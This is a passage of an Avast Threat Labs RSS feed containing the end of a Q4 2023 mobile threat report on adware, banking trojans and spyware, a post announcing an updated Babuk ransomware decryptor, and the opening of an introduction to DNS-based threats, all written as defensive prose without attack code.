<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="614" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin-614x1024.jpg" alt="" class="wp-image-8002" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin-614x1024.jpg 614w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin-180x300.jpg 180w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-HiddenAds-device-admin.jpg 768w" sizes="(max-width: 614px) 100vw, 614px" /><figcaption class="wp-element-caption">MobiDash requesting device administrator rights to impede its removal from the victim’s device</figcaption></figure></div>
<p>The risk ratio of adware increased in Q4 2023, and we observed an increase in overall protected users of 14%. This trend is largely due to SocialBar and its increased prevalence on mobile devices, as evidenced by the large spike in the graph, that subsides into the later part of the quarter. Conversely, HiddenAds risk ratio has decreased this quarter.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-1024x404.png" alt="" class="wp-image-8003" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.Q3-Q4-graph-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio of mobile adware in Q3/2023 and Q4/2023 </figcaption></figure></div>
<p>Brazil, India and Argentina again have the most protected users this quarter. Conversely, Indonesia, India and South Africa have the highest risk ratios, meaning users are most likely to encounter adware in these countries according to our telemetry.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-1024x639.png" alt="" class="wp-image-8004" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Q4-23-Risk-Map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for mobile adware in Q4/2023</figcaption></figure></div>
<h3 class="wp-block-heading">Chameleon banker’s re-emergence</h3>
<p><em>Bankers are a sophisticated type of mobile malware that targets banking details, cryptocurrency wallets, and instant payments with the intent of extracting money. Generally distributed through phishing messages or fake websites, Bankers can take over a victim’s device by abusing the accessibility service. Once installed and enabled, they often monitor 2FA SMS messages and may display fake bank overlays to steal login information.</em></p>
<p>As is seemingly the trend most quarters, we once again observed a  comeback of a previously discovered strain of banker, this time with Chameleon coming back after a several month hiatus with new malicious features added. Remote desktop access applications are abused to perform fraudulent transactions on behalf of victims, followed by the introduction of malicious FakeRust bankers. Continuing the trend from last quarter and despite the new and updated entries, bankers are on the decline in terms of protected users yet again. Cerberus/Alien leads the pack followed by Coper, Bankbot and Hydra.</p>
<p>The <a href="https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action" target="_blank" rel="noreferrer noopener">Chameleon</a> banker highlighted in the <a href="https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/" target="_blank" rel="noreferrer noopener">Q2/2023 report</a> is making a comeback with newly added features that allow it more ways to take over and control victim devices. Previously targeting Australia and Poland, it disguised itself as tax or banking applications or crypto currency exchanges. With its re-emergence, Chameleon targets users in the UK and Italy as well and it appears to be primarily distributed by phishing pages disguised as legitimate websites distributing the malware. As with most bankers, Chameleon requires the Accessibility service to perform its full device take over. One of its upgrades allows it to display the Accessibility service prompt using an HTML based pop up on devices running Android 13, a step up from previously used in-app prompts. Once it has full device control, this banker can now disable biometric unlocks for the device and installed applications. This bypass means Chameleon can spy on user PIN codes or passwords that must be used in lieu of biometrics, potentially adding another layer of information theft to its repertoire. The implications of this could be severe if more bankers adopt a similar approach into the future.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="218" height="414" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Chameleon-HTML-prompts.jpg" alt="" class="wp-image-8005" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Chameleon-HTML-prompts.jpg 218w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Chameleon-HTML-prompts-158x300.jpg 158w" sizes="(max-width: 218px) 100vw, 218px" /><figcaption class="wp-element-caption">Chameleon’s new HTML prompt that overlays on top of App info, prompting victims to enable Accessibility rights</figcaption></figure></div>
<p>In a new trend, remote desktop access applications have been used in attacks targeting mobile user bank accounts. Due to database leaks from popular banks, threat actors have been able to gain access to sensitive victim data that they used in communication with victims. Pretending to be the bank security teams, criminals con victims into downloading the legitimate RustDesk application. After the app is installed, the threat actors request a unique identifier from the victim, with which they took over the device and conducted fraudulent payments on the user’s behalf. </p>
<p>To make the situation worse, this device takeover has made it more difficult for victims to prove fraudulent activity, as it came from their device. RustDesk was removed from the PlayStore as a result, even though the application is not harmful on its own. Following the removal, fake banking websites were used to distribute a continuation of this threat, dubbed <a href="https://news.drweb.com/show/?i=14755&lng=en" target="_blank" rel="noreferrer noopener">FakeRust</a>. Pretending to be bank support websites, they distributed fake support applications that allowed them remote access to devices to steal money as with RustDesk.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="623" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-623x1024.jpg" alt="" class="wp-image-8006" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-623x1024.jpg 623w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-182x300.jpg 182w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-768x1263.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout-934x1536.jpg 934w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-FakeRust-using-RustDesk-layout.jpg 1080w" sizes="(max-width: 623px) 100vw, 623px" /><figcaption class="wp-element-caption">FakeRust using the RustDesk layout but changing the title to Support in Cyrillic</figcaption></figure></div>
<p>For several quarters, we have observed a decline in the prevalence of bankers. We suspect that difficulty in spreading updated and new banker strains is rising, hence the lowering numbers of victims in the past year. It is likely that phishing websites and direct messaging through WhatsApp and other messengers isn’t as effective as widespread SMS message campaigns of the past.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-1024x404.png" alt="" class="wp-image-8007" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-Bankers-Q3-Q4-graph-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio of mobile bankers in Q1/2023-Q4/2023</figcaption></figure></div>
<p>Turkey has the highest risk ratio this quarter, followed by Spain and Singapore. The focus this quarter remained on Europe with less bankers spotted in Australia compared to last quarter.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-1024x639.png" alt="" class="wp-image-8008" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-Q4-Bankers-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for mobile bankers in Q4/2023</figcaption></figure></div>
<h3 class="wp-block-heading">SpyLoans and Malicious WhatsApp mods</h3>
<p><em>Spyware is used to spy on unsuspecting victims with the intent of extracting personal information such as messages, photos, location, or login details. It uses fake adverts, phishing messages, and modifications of popular applications to spread and harvest user information. State backed commercial spyware is becoming more prevalent and is used to target individuals with 0-day exploits.</em></p>
<p>Spymax continues to be the most prevalent spyware strain quartering Q4 2023, trailed by SexInfoSteal, RealRAT and WAMods. Several new spyware strains enter the fray this quarter, one even attempting to infect iOS devices to steal user data. Malicious messenger mods for WhatsApp continue their spread as users are advised to refrain from installing messenger mods. Finally, SpyLoans continue to be a blackmailing menace that even threatens users with physical violence if they don’t pay excessive amounts of money to the threat actors.</p>
<p>A new backdoor spyware has also entered the market through the PlayStore. Called <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/stealth-backdoor-android-xamalicious-actively-infecting-devices/" target="_blank" rel="noreferrer noopener">Xamalicious</a>, it uses an open-source framework called Xamarin, which can be used to build Android and iOS apps with .NET and C#. The use of the Xamarin framework has aided malware authors in staying undetected and on the PlayStore for extended periods of time. While Xamalicious has been taken down from the PlayStore, many of these apps remain available on third-party marketplaces. Once installed on the victim’s device, it will try to obtain Accessibility privileges with which it downloads a second-stage payload assembly DLL that allows it to take full control of the device. It has been seen installing other malicious apps, clicking on adverts, and stealing sensitive user data. Specifically, it collects device details, location, lists of apps and may access messages as well. We observe Xamalicious mainly targeting Brazil, UK and the US.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="476" height="757" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Xamalicious-prompt.png" alt="" class="wp-image-8009" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Xamalicious-prompt.png 476w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1.-Xamalicious-prompt-189x300.png 189w" sizes="(max-width: 476px) 100vw, 476px" /><figcaption class="wp-element-caption">Xamalicious requesting Accessibility privileges to take over the victim’s device</figcaption></figure></div>
<p>A new <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fake-android-and-ios-apps-steal-sms-and-contacts-in-south-korea/" target="_blank" rel="noreferrer noopener">SpyAgent</a> is also targeting South Korean users through direct messages and phishing websites that mimic legitimate services such as messengers or yoga training apps. Interestingly, this threat targets both Android and iOS. Once downloaded on Android, it tries to steal contact information and SMS messages and can monitor calls, all of which are sent to the malware authors. While on Android, the process for spread is as seen in other spywares, on iOS the threat actors use a third-party tool that allows installing of apps out with the AppStore called Scarlet. Users who already have Scarlet with a certificate set to ‘Trust’ expose their devices to this spyware that can run anytime once installed. Scarlet then collects contact info from iOS users that is likely used for further distribution of the malware or other fraudulent activities. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="576" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-Fake-iOS-AppStore-SpyAgent.png" alt="" class="wp-image-8010" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-Fake-iOS-AppStore-SpyAgent.png 576w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2.-Fake-iOS-AppStore-SpyAgent-169x300.png 169w" sizes="(max-width: 576px) 100vw, 576px" /><figcaption class="wp-element-caption">Fake website that mimics the AppStore, prompting the victim to download and install the SpyAgent</figcaption></figure></div>
<p>Our telemetry shows a continued rise in the prevalence of SpyLoans in 2023, fake loan applications that harvest user data that is used to extort victims into sending money to the malware authors. Another round of these applications was present on the PlayStore as <a href="https://www.welivesecurity.com/en/eset-research/beware-predatory-fintech-loan-sharks-use-android-apps-reach-new-depths/" target="_blank" rel="noreferrer noopener">reported by ESET</a>. </p>
<p>Despite their removal, these applications are increasingly propagated through SMS messages but also on social media such as TikTok, Facebook and YouTube. Several of these malwares also had fake loan websites set up, giving them the appearance of legitimacy. In some cases, the threat actors also impersonate reputable loan providers. Once installed, the SpyLoan uses SMS verification to check that the user is from a specific country, followed by an extensive and invasive loan application that requires the victim to allow access to their contacts, messages, bank account information, ID cards and photos on their device. Social media reviews highlight the dismay of victims as the malware authors threaten to send sensitive information to their friends and relatives, in some cases even threatening physical harm.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="623" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-623x1024.jpg" alt="" class="wp-image-8011" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-623x1024.jpg 623w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-183x300.jpg 183w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-768x1262.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID-935x1536.jpg 935w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3.-SpyLoan-requesting-ID.jpg 1080w" sizes="(max-width: 623px) 100vw, 623px" /><figcaption class="wp-element-caption"><em>SpyLoan malware directing the victim to upload </em>photos<em> of their ID card</em></figcaption></figure></div>
<p>As reported last quarter, we continued to observe malicious mods for popular messengers such as WhatsApp and Telegram in Q4 2023. In an interesting twist, <a href="https://securelist.com/spyware-whatsapp-mod/110984/" target="_blank" rel="noreferrer noopener">spyware WhatsApp mods</a> were seen distributed through Telegram. Once users install the malicious mod, it sets up monitoring of the device, such as what applications are used, when new messages come in or when new files are downloaded. These events trigger the spy module that starts listening and sends away any interesting information to the malware authors. It then listens for further commands, which may include sending files to a C2 server, recording sound, and uploading contacts and messages among others. It appears these spyware mods are targeting Arabic speaking countries, as the developers set up their C2 servers in Arabic. It is likely we will see more malicious spyware mods for these popular applications going forward.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="443" height="185" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-WAMod-upload-contacts.png" alt="" class="wp-image-8012" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-WAMod-upload-contacts.png 443w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/4.-WAMod-upload-contacts-300x125.png 300w" sizes="(max-width: 443px) 100vw, 443px" /><figcaption class="wp-element-caption">WhatsApp mod monitoring information about the victim’s accounts and contacts, initiated every 5 minutes and sent to C2 server</figcaption></figure></div>
<p>Spyware has decreased in prevalence this quarter, despite the newly found strains of malicious mods, SpyLoans and others. With this, the risk ratio has also decreased compared to last quarter.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-1024x404.png" alt="" class="wp-image-8013" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/5.-Spyware-Q3-Q4-graph-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio of mobile spyware in Q3/2023 and Q4/2023</figcaption></figure></div>
<p>Brazil, Turkey, and the US have the highest numbers of protected users this quarter. However, the risk ratio in all 3 top countries has gone down this quarter. Yemen, Turkey, and Egypt have the highest risk ratios this quarter.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-1024x639.png" alt="" class="wp-image-8014" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/6.-Spyware-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for mobile spyware in Q4/2023</figcaption></figure></div>
<p class="has-text-align-right"><em>Jakub Vávra, Malware Analyst</em></p>
<h2 class="wp-block-heading">Acknowledgements / Credits</h2>
<div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-1 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<h6 class="wp-block-heading">Malware researchers</h6>
<p>Adolf Středa<br>Alexej Savčin<br>Branislav Kramár<br>David Álvarez<br>David Jursa<br>Igor Morgenstern<br>Jakub Křoustek<br>Jakub Vávra<br>Jan Rubín<br>Jan Vojtěšek<br>Ladislav Zezula<br>Luigino Camastra<br>Luis Corrons<br>Martin Chlumecký<br>Matěj Krčma<br>Michal Salát<br>Ondřej Mokoš</p>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<h6 class="wp-block-heading">Data analysts</h6>
<p>Pavol Plaskoň<br>Filip Husák<br>Lukáš Zobal</p>
</div>
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<h6 class="wp-block-heading">Communications</h6>
<p>Brittany Posey<br>Emma McGowan</p>
</div>
</div>
<p>The post <a href="https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/">Avast Q4/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police</title>
<link>https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/?utm_source=rss&utm_medium=rss&utm_campaign=avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police</link>
<dc:creator><![CDATA[Threat Research Team]]></dc:creator>
<pubDate>Tue, 09 Jan 2024 09:00:00 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[decryptor]]></category>
<category><![CDATA[decryptors]]></category>
<category><![CDATA[ransomware]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=7916</guid>
<description><![CDATA[<p>In cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called Tortilla.</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/">Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<p>Babuk, an advanced ransomware strain, was publicly discovered in 2021. Since then, Avast has blocked more than 5,600 targeted attacks, mostly in Brazil, Czech Republic, India, the United States, and Germany.</p>
<p>Today, in cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called <a href="https://blog.talosintelligence.com/babuk-exploits-exchange/" target="_blank" rel="noreferrer noopener">Tortilla</a>. To download the tool, click <a href="https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe" target="_blank" rel="noreferrer noopener">here</a>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-1024x639.png" alt="" class="wp-image-7917" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/Tagger_Babuk_31_2021-01-01—2023-12-18-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Babuk attacks blocked by Avast since 2021</figcaption></figure></div>
<h2 class="wp-block-heading">Babuk Ransomware Decryptor </h2>
<p>In September 2021, the <a href="https://www.bleepingcomputer.com/news/security/babuk-ransomwares-full-source-code-leaked-on-hacker-forum/" target="_blank" rel="noreferrer noopener">source code of the Babuk ransomware was released</a> on a Russian-speaking hacking forum. The ZIP file also contained 14 private keys (one for each victim). Those keys were ECDH-25519 private keys needed for decryption of files encrypted by the Babuk ransomware. </p>
<h3 class="wp-block-heading">The Tortilla Campaign </h3>
<p>After brief examination of the provided sample (originally named tortilla.exe), we found out that the encryption schema had not changed <a href="https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/" target="_blank" rel="noreferrer noopener">since we analyzed Babuk samples 2 years ago</a>. The process of extending the decryptor was therefore straightforward. </p>
<p>The Babuk encryptor was likely created from the leaked sources using the build tool. According to Cisco Talos, a single private key is used for all victims of the Tortilla threat actor. This makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files. As with all Avast decryptors, the Babuk Ransomware Decryptor is available for free. </p>
<p>Babuk victims can find out whether they were part of the Tortilla campaign by looking at the extension of the encrypted files and the ransom note file. Files encrypted by the ransomware have the <code>.babyk</code> extension as shown in the following example:</p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="879" height="399" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files.png" alt="" class="wp-image-7918" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files.png 879w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files-300x136.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/001-babuk-encrypted-files-768x349.png 768w" sizes="(max-width: 879px) 100vw, 879px" /></figure>
<p>The ransom note file is called <strong>How To Restore Your Files.txt</strong> and is dropped to every directory. This is how the ransom note looks like:</p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="647" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-1024x647.png" alt="" class="wp-image-7919" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-1024x647.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-300x189.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note-768x485.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/01/002-babuk-ransom-note.png 1042w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>Babuk victims can download the Babuk Decryptor for free: <a href="https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe" target="_blank" rel="noreferrer noopener">https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe</a>. It is also available within the NoMoreRansom project. </p>
<p>We would like to thank Cisco Talos and the Dutch Police for the cooperation.</p>
<h3 class="wp-block-heading">IOCs (indicators of compromise) </h3>
<p><code>bd26b65807026a70909d38c48f2a9e0f8730b1126e80ef078e29e10379722b49 (tortilla.exe) </code></p>
<p>The post <a href="https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/">Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Opening a new front against DNS-based threats</title>
<link>https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/?utm_source=rss&utm_medium=rss&utm_campaign=opening-a-new-front-against-dns-based-threats</link>
<dc:creator><![CDATA[Threat Intelligence Team]]></dc:creator>
<pubDate>Thu, 14 Dec 2023 17:25:31 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[DNS]]></category>
<category><![CDATA[malware]]></category>
<category><![CDATA[protection]]></category>
<category><![CDATA[threats]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=7890</guid>
<description><![CDATA[<p>DNS is a hierarchical decentralized naming system. There are multiple ways in which threat actors can leverage DNS to carry out attacks. We will provide a an introduction to DNS threat landscape.</p>
<p>The post <a href="https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/">Opening a new front against DNS-based threats</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<p>Domain Name System (DNS) is a hierarchical decentralized naming system for numerous network devices connected to the internet or a private network. Its primary function is to translate user-friendly domain names, such as <a href="http://www.avast.com" target="_blank" rel="noreferrer noopener">www.avast.co</a><a href="http://www.avast.com">m</a>, into numerical IP addresses that devices use to identify each other on a network.</p>
<p>When a domain name is entered into a web browser, the computer first checks its local cache to see if it already knows the corresponding IP address. If the IP address is not found locally, the computer queries a DNS resolver. This resolver could be an Internet Service Provider (ISP) or a third-party service like Google’s 8.8.8.8. The resolver then checks its cache. If the IP address is not found, it acts as a client and queries the root DNS servers (in case of recursive resolvers).</p>
<p>As with basically any other technology, however, this system can also become a target of malicious actors. Let’s look at how Avast can protect users against various DNS threats, showcasing a few notorious malware families.</p>
<h2 class="wp-block-heading">How DNS threats work</h2>
<p>There are multiple ways in which threat actors can leverage DNS to carry out attacks. It is also out of the scope of this text to describe all the existing techniques in detail. However, we will provide a brief introduction to DNS threat landscape so that the reader can imagine how attacks like these work and why the threat actors are interested in such vectors.</p>
<p><code>Rogue/malicious DNS servers</code> are specifically set up by threat actors to intercept and manipulate DNS queries. When a device queries DNS, the rogue DNS server can then respond with incorrect or malicious IP addresses, redirecting legitimate traffic to malicious destinations.</p>
<p><code>DNS tunneling</code> is a technique where attackers use DNS protocols to encapsulate non-DNS traffic. This communication can be two-way directional, meaning both requests as well as responses can be encapsulated. This communication is usually used (but is not limited) for exchanging malware commands with a Command & Control (C2) server, and/or exfiltrating data from the victims.</p>
<p><code>DNS cache poisoning</code>, also known as <code>DNS spoofing</code>, is a technique where attackers manipulate the DNS cache of a resolver, introducing false mappings between domain names and IP addresses. By injecting false DNS records into the cache, attackers usually redirect users to malicious sites where they are then able to intercept sensitive information. With this ability, they can perform man-in-the-middle (MitM) attacks. This technique can be also particularly dangerous, since with a successful spoofing taking place, the domains look legitimate to the user – the domain names are the same as the user is used to – though they lead to a different server, using the different IP address.</p>
<p><code>DNS fast fluxing</code> is based on rapidly and regularly changing the IP addresses for a domain in the DNS records, making it more difficult to track and block the attackers’ infrastructure. Usually, the attackers either have a set of compromised servers/botnet that they can use, or they use a specific approach for changing the IP addresses, behaving similarly to a more traditional domain generation algorithm (DGA).</p>
<h3 class="wp-block-heading">Why do attackers do it?</h3>
<p>The reasons why attackers do this type of attack vary based on their techniques, as well as their intents. However, we can sum up the malicious purposes into these short points:</p>
<ul>
<li>The malware can <strong>receive commands and instructions</strong>, enabling two-way communication </li>
<li>The threat actor can <strong>deploy</strong> <strong>an additional payload</strong> onto the infected device </li>
<li>Information stealers can <strong>exfiltrate sensitive data</strong> from the infected device </li>
<li>The communication is more <strong>obfuscated</strong>, rendering it more difficult to track properly </li>
<li>The communication is usually <strong>enabled by default</strong>, since the traffic operates on a common port 53 </li>
<li>The traffic may <strong>bypass traditional AVs and gateways</strong> due to the possible lack of monitoring and scanning</li>
</ul>
<h2 class="wp-block-heading">Threats in the wild</h2>
<p>The number of malware families leveraging DNS to carry out malicious activity is increasing. At Avast, we keep up with the current trends and, with our DNS scanning feature, we provide robust protection even against these kinds of attacks.</p>
